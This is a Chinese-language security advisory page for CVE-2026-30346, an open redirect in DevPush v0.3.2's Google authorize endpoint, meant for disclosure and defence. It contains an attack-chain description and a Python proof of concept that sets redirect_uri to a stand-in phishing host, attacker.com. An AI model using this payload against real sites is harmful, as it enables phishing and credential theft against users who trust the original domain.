IPBUF安全漏洞报告
English
CVE-2026-30346 CVSS 4.3 中危

CVE-2026-30346: DevPush开放重定向漏洞

披露日期: 2026-04-27

漏洞信息

漏洞编号
CVE-2026-30346
漏洞类型
开放重定向
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
hunvreus DevPush

相关标签

Open Redirect开放重定向hunvreus DevPushCVE-2026-30346PhishingWeb Security

漏洞概述

hunvreus DevPush v0.3.2版本的/api/google/authorize端点存在开放重定向漏洞。由于服务端未对重定向参数进行有效验证,攻击者可构造恶意URL诱导用户点击,将受害者重定向至钓鱼网站或恶意站点,进而窃取用户凭证或实施社会工程学攻击。

技术细节

该漏洞位于hunvreus DevPush的Google授权接口/api/google/authorize中。应用程序在处理OAuth流程或类似回调时,直接使用了用户可控的输入(如redirect_uri参数)作为HTTP 302重定向的目标地址,且未建立允许域名的白名单校验机制。攻击者利用此缺陷,可将重定向地址篡改为任意恶意网站。当受害者访问攻击者精心构造的链接时,浏览器会跟随服务端的Location头跳转至恶意页面,利用用户对原域名的信任进行网络钓鱼。

攻击链分析

STEP 1
1. 侦察
攻击者发现目标使用hunvreus DevPush v0.3.2,并识别出/api/google/authorize接口。
STEP 2
2. 制作 payload
攻击者构造包含恶意URL的参数,例如将redirect_uri设置为钓鱼网站地址。
STEP 3
3. 社会工程学传播
攻击者将包含恶意参数的完整URL发送给目标用户,诱导其点击。
STEP 4
4. 漏洞利用
受害者点击链接,浏览器向服务器发送请求。
STEP 5
5. 重定向与攻击
服务器响应302重定向,将受害者浏览器引导至攻击者控制的恶意站点进行下一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_open_redirect(target_url): # Malicious destination URL evil_url = "http://attacker.com/phish" # The vulnerable endpoint likely takes a redirect parameter # Common parameter names: redirect_uri, url, next, return payload_url = f"{target_url}/api/google/authorize?redirect_uri={evil_url}" try: # Send request, do not follow redirects to capture the Location header response = requests.get(payload_url, allow_redirects=False, timeout=5) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if evil_url in location: print(f"[+] Vulnerability Confirmed!") print(f" Target: {target_url}") print(f" Redirects to: {location}") return True print("[-] Vulnerability not detected or parameter name incorrect.") return False except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://localhost:8000" # Replace with actual target check_open_redirect(target)

影响范围

hunvreus DevPush 0.3.2

防御指南

临时缓解措施
如果无法立即升级,建议配置Web应用防火墙(WAF)规则,拦截包含外部域名引用的/api/google/authorize请求参数,并对用户进行安全教育,警惕不明来源的跳转链接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表